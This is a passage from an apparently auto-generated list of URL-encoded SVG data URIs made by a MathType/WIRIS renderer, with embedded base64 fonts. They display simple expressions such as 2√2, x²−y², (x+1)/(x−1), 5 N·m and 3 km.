sAIQsAg8ALAKELAD1LADELAH1LAKELAF1LAKELAA1LADELACPLAHELAIPDEwARABIwAREAEzAAIg%2FnCQAZD%2BcJABkALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAAAAEAAPW2NYFfDzz1AAMIAP%2F%2F%2F%2F%2FVre7u%2F%2F%2F%2F%2F9Wt7u4AAP7QA7cG0AAAAAoAAgABAAAAAAABAAAHPv5OAAAXcAAA%2F%2F4DtwABAAAAAAAAAAAAAAAAAAAAAwDVAAAC
IAAAAiAAAAAAAAAAAAAkAAAAowAAASQAAQAAAAMACgACAAAAAAACAIAEAAAAAAAEAABNAAAAAAAAABUBAgAAAAAAAAABAD4AAAAAAAAAAAACAA4APgAAAAAAAAADAFwATAAAAAAAAAAEAD4AqAAAAAAAAAAFABYA5gAAAAAAAAAGAB8A%2FAAAAAAAAAAIABwBGwABAAAAAAABAD4AAAABAAAAAAACAA4APgABAAAAAAADAFwATAABAAAAAAAEAD4AqAABAAAAAAAFABYA5gABAAAAAAAGAB8A%2FAABAAAAAAAIABwBGwADAAEECQABAD4AAAADAAEECQACAA4APgADAAEECQADAFwATAADAAEECQAEAD4AqAADAAEECQAFABYA5gADAAEECQAGAB8A%2FAADAAEECQAIABwBGwBSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAAUgBvAHUAbgBkACAAYgByAGEAYwBrAGUAdABzACAAdwBpAHQAaAAgAGEAcwBjAGUAbgB0ACAAMQA4ADUANABSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFYAZQByAHMAaQBvAG4AIAAyAC4AMFJvdW5kX2JyYWNrZXRzX3dpdGhfYXNjZW50XzE4NTQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAAAAAMAAAAAAAADnwHPAAAAAAAAAAAAAAAAAAAAAAAAAAC5B%2F8AAY2FAA%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2212.5%22%20y%3D%2216%22%3E(%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2218.5%22%20y%3D%2216%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22math117e62166fc8586dfa4d1bc0e17%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2230.5%22%20y%3D%2216%22%3E%2B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2242.5%22%20y%3D%2216%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22math117e62166fc8586dfa4d1bc0e17%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2254.5%22%20y%3D%2216%22%3E%2B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2266.5%22%20y%3D%2216%22%3E4%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2273.5%22%20y%3D%2216%22%3E)%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2223%22%20width%3D%2235%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmsqrt%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsqrt%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2219%22%3E2%3C%2Ftext%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(9.5%2C20.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(9.5%2C20.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2221.5%22%20x2%3D%2233.5%22%20y1%3D%224.5%22%20y2%3D%224.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2227.5%22%20y%3D%2219%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2222%22%20width%3D%2248%22%20wrs%3Abaseline%3D%2218%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmsup%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsup%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmsup%3E%3Cmi%3Ey%3C%2Fmi%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)form
at('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2218%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2212.5%22%20y%3D%2211%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2218%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2235.5%22%20y%3D%2218%22%3Ey%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2243.5%22%20y%3D%2211%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmi%3Ey%3C%2Fmi%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2216.5%22%20y%3D%2216%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x
%3D%2228.5%22%20y%3D%2216%22%3Ey%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2219%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E24%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%229.5%22%20y%3D%2215%22%3E24%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2243%22%20width%3D%2242%22%20wrs%3Abaseline%3D%2227%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmfrac%3E%3Cmrow%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmn%3E1%3C%2Fmn%3E%3C%2Fmrow%3E%3Cmrow%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmn%3E1%3C%2Fmn%3E%3C%2Fmrow%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1f49eb453fa539158a42c727cab'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADxjdnQgDVUNBwAAAVgAAAA6Z2x5ZoPi2VsAAAGUAAAA62hlYWQQC2qxAAACgAAAADZoaGVhCGsXSAAAArgAAAAkaG10eE2rRkcAAALcAAAADGxvY2EAHTwYAAAC6AAAABBtYXhwBT0FPgAAAvgAAAAgbmFtZaBxlY4AAAMYAAABn3Bvc3QB9wD6AAAEuAAAACBwcmVwa1uragAABNgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACsiEv%2F%2FAAAAKyIS%2F%2F%2F%2F1t3wAAEAAAAAAAAAAAFUAywAgAEAAFYAKgJYAh4BDgEsAiwAWgGAAoAAoADUAIAAAAAAAAAAKwBVAIAAqwDVAQABKwAHAAAAAgBVAAADAAOrAAMABwAAMxEhESUhESFVAqv9qwIA%2FgADq%2FxVVQMAAAEAgABVAtUCqwALAEkBGLIMAQEUExCxAAP2sQEE9bAKPLEDBfWwCDyxBQT1sAY8sQ0D5gCxAAATELEBBuSxAQETELAFPLEDBOWxCwX1sAc8sQkE5TEwEyERMxEhFSERIxEhgAEAVQEA%2FwBV%2FwABqwEA%2FwBW%2FwABAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAABAAAAAQAA1XjOQV8PPPUAAwQA%2F%2F%2F%2F%2F9Y6E3P%2F%2F%2F%2F%2F1joTcwAA%2FyAEgAOrAAAACgACAAEAAAAAAAEAAAPo%2F2oAABdwAAD%2FtgSAAAEAAAAAAAAAAAAAAAAAAAADA1IAVQNWAIADVgCAAAAAAAAAACgAAAChAAAA6wABAAAAAwBeAAUAAAAAAAIAgAQAAAAAAAQAAN4AAAAAAAAAFQECAAAAAAAAAAEAEgAAAAAAAAAAAAIADgASAAAAAAAAAAMAMAAgAAAAAAAAAAQAEgBQAAAAAAAAAAUAFgBiAAAAAAAAAAYACQB4AAAAAAAAAAgAHACBAAEAAAAAAAEAEgAAAAEAAAAAAAIADgASAAEAAAAAAAMAMAAgAAEAAAAAAAQAEgBQAAEAAAAAAAUAFgBiAAEAAAAAAAYACQB4AAEAAAAAAAgAHACBAAMAAQQJAAEAEgAAAAMAAQQJAAIADgASAAMAAQQJAAMAMAAgAAMAAQQJAAQAEgBQAAMAAQQJAAUAFgBiAAMAAQQJAAYACQB4AAMAAQQJAAgAHACBAE0AYQB0AGgAIABGAG8AbgB0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAATQBhAHQAaAAgAEYAbwBuAHQATQBhAHQAaAAgAEYAbwBuAHQAVgBlAHIAcwBpAG8AbgAgADEALgAwTWF0aF9Gb250AE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAAAwAAAAAAAAH0APoAAAAAAAAAAAAAAAAAAAAAAAAAALkHEQAAjYUYALIAAAAVFBOxAAE%2F)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%222.5%22%20x2%3D%2238.5%22%20y1%3D%2221.5%22%20y2%3D%2221.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2216%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f49
eb453fa539158a42c727cab%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2220.5%22%20y%3D%2216%22%3E%2B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2232.5%22%20y%3D%2216%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2239%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f49eb453fa539158a42c727cab%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2220.5%22%20y%3D%2239%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2232.5%22%20y%3D%2239%22%3E1%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2247%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E5%3C%2Fmn%3E%3Cmo%3E%26%23xA0%3B%3C%2Fmo%3E%3Cmtext%3EN%3C%2Fmtext%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmtext%3Em%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1cedebb6e872f539bef8c3f9198'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAW2hlYWQQC2qxAAAB6AAAADZoaGVhCGsXSAAAAiAAAAAkaG10eE2rRkcAAAJEAAAACGxvY2EAHTwYAAACTAAAAAxtYXhwBT0FPgAAAlgAAAAgbmFtZaBxlY4AAAJ4AAABn3Bvc3QB9wD6AAAEGAAAACBwcmVwa1uragAABDgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAALf%2F%2FwAAALf%2F%2F%2F9KAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQDrAcAAAwAbGAGwBBCxAAP0sQID9LEFA%2FQAsAQQsQMG9DAxEzMVI4BrawHAawAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUBawCAAAAAAAAAACgAAABbAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E5%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2219.5%22%20y%3D%2216%22%3EN%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1cedebb6e872f539bef8c3f9198%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2229.5%22%20y%3D%2216%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2
239.5%22%20y%3D%2216%22%3Em%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%229%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmtext%3EJ%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2215%22%3EJ%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2223%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmtext%3Em%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2215%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2215.5%22%20y%3D%2215%22%3Em%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2231%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmtext%3Ekm%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2215%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22A